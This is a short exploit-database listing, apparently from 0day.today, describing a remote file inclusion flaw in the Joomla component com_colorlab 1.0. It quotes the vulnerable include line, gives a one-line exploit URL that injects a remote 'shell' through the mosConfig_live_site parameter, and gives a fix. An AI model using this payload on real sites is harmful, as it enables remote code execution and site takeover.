[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2222
Category
web applications
Date add
11-10-2007
Platform
unsorted
=====================================================================
Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability
=====================================================================



--------------------

Joomla com_colorlab Remote File Include

--------------------

Found : xoron

--------------------

Download:
http://download.joomlaportal.ch/content/view/474/

--------------------

Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );

--------------------

Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?

--------------------

How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

3-save and exit

--------------------

Thanx: mdx :)

--------------------



#  0day.today [2024-12-27]  #